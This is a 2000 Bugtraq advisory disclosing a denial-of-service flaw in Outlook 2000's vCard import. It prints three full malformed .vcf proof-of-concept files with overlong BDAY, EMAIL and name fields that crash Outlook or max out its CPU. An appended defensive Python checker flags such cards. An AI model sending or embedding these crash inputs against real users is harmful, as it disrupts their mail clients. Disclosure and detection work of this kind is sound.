Bugtraq mailing list archives
vCard DoS on Outlook 2000
From: joelmoses () MINDSPRING COM
Date: Thu, 31 Aug 2000 11:51:20 -0400
Vulnerability in vCard import in Outlook 2000
Released: August 30, 2000

Summary
=======

Under certain conditions, excessively long or malformed fields in a vCard (.vcf) file can cause Microsoft Outlook 2000 to either overflow or excessively utilize system resources.

Background
==========

The specifications regarding vCard MIME types and field contents can be found in RFCs 2425 and 2426. Although RFC 2426 section 2.6 specifically requires lines longer than 75 characters to be folded as defined in [MIME-DIR], it appears Outlook does not support line folding, and will attempt to import any field in the file as one value, even if it is several pages long or (in one case) overflows a data field within Outlook.

The effect this unlimited import attempt has on Outlook 2000 varies between field types. Some fields will cause Outlook to consume nearly all CPU time, and certain others (especially date/revision fields and e-mail fields) will cause Outlook to terminate immediately due to an overflow.

Severity
========

Outlook 2000 does not attempt to open and import a .vcf file that a user receives via e-mail without prompting the user first. However, vCard files are extremely common, and many users have trained themselves to ignore the warning dialog box.

Outlook does, however, open a vCard file with no questions asked if the user saves it to a directory and double-clicks it from Windows Explorer. In this situation, the vCard is processed directly with no warning or status messages displayed to the user.

Affected Configurations
=======================

Microsoft Outlook 2000 was the only platform tested (on Windows NT 4.0 Workstation, Service Pack 6a+hotfixes).

Affected fields in vCard file causing an overflow:

- email:
- bday; value=date (as low as 52 characters of form YYYY-MM-D(60)

Affected fields in vCard file causing excessive CPU utilization:

- name:
- nickname:
- fn:
- title:
- title;language=de;value=text:
- tel:
- tel;<label>:
- tel;<label>,<label>:

Fields which do not appear to be affected:

- note:

Fields which do not appear to be supported:

- any fields which continue on the next line or have defined newlines per RFC-2425
- key:
- o:

No other fields were tested.

Examples
========

The following examples will cause the advertised behavior.

1) A modification of the "bday" field to extend beyond 55 characters. This example appears to be the smallest amount of text required to elicit the symptom. This example will cause Outlook 2000 to overflow and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927 4982739472937492873
EMAIL;PREF;INTERNET:mb () goerlitz de
REV:20000830T191121Z
END:VCARD

2) A modification of the "e-mail" field with a large amount of text data masquerading as an e-mail address. This example will cause Outlook 2000 to overflow and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb () goerlitz de sadsack nothing doing is an.overflo .possible.sadsack.not hing.doing.is.an.overflow.possible.
<content clipped for brevity - envision lots of text here>
.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD

3) A modification of the "N" or "name" field with a large amount of text will not cause Outlook to terminate, but will increase Outlook's CPU utilization to 99%.

BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister
<content clipped for brevity - envision lots of text here>
Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb () goerlitz de
REV:20000830T191121Z
END:VCARD

Resolution
==========

None at present, other than to disassociate the .vcf extension from Outlook. There may be more fields affected -- these are merely the initially tested ones.
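A pre-delivery check for the conditions the advisory describes (lines over 75 characters that were never folded, oversized field values, and a BDAY that is not a date), as an added example that is not part of the original post. The function names, the 256-character value cap and the BDAY pattern are assumptions chosen for illustration; the sample cards are constructed.

```python
import re

MAX_LINE = 75    # RFC 2426 section 2.6: longer lines must be folded
MAX_VALUE = 256  # assumed gateway policy cap on one unfolded value
# Assumed BDAY shape: YYYYMMDD or YYYY-MM-DD, optional time part
BDAY_RE = re.compile(r"\d{4}-?\d{2}-?\d{2}(T[0-9:]+(Z|[+-]\d{2}:?\d{2})?)?")


def unfold(text):
    """Undo RFC 2425 folding: a line break followed by one space or tab."""
    return re.sub(r"\r?\n[ \t]", "", text)


def prop_name(line):
    """Property name without group prefix or parameters, upper-cased."""
    head = re.split(r"[;:]", line, maxsplit=1)[0]
    return head.rsplit(".", 1)[-1].strip().upper()


def check_vcard(text):
    """Return (property, reason) findings for one .vcf body."""
    findings = []
    current = ""
    for raw in text.splitlines():
        if not raw.startswith((" ", "\t")):
            current = prop_name(raw)  # continuation lines keep the last name
        if len(raw) > MAX_LINE:
            findings.append((current, "unfolded line over 75 characters"))
    for line in unfold(text).splitlines():
        if ":" not in line:
            continue  # e.g. tail of a quoted-printable soft line break
        value = line.split(":", 1)[1].strip()
        name = prop_name(line)
        if len(value) > MAX_VALUE:
            findings.append((name, "value over policy cap"))
        if name == "BDAY" and not BDAY_RE.fullmatch(value):
            findings.append((name, "not a date"))
    return findings


# Constructed samples (not the advisory's files): one clean card, one bad card.
CLEAN = "BEGIN:VCARD\r\nVERSION:2.1\r\nFN:Test Person\r\nBDAY:19630915\r\nEND:VCARD\r\n"
BAD = ("BEGIN:VCARD\r\nVERSION:2.1\r\nFN:Test Person\r\n"
       "BDAY:" + "1963091513" * 6 + "\r\n"
       "EMAIL;PREF;INTERNET:" + "a" * 300 + "@example.invalid\r\nEND:VCARD\r\n")

if __name__ == "__main__":
    for label, card in (("clean", CLEAN), ("bad", BAD)):
        print(label, check_vcard(card))
```

A card with any finding can be quarantined or have the offending property stripped before the .vcf reaches a client that imports each field as a single value.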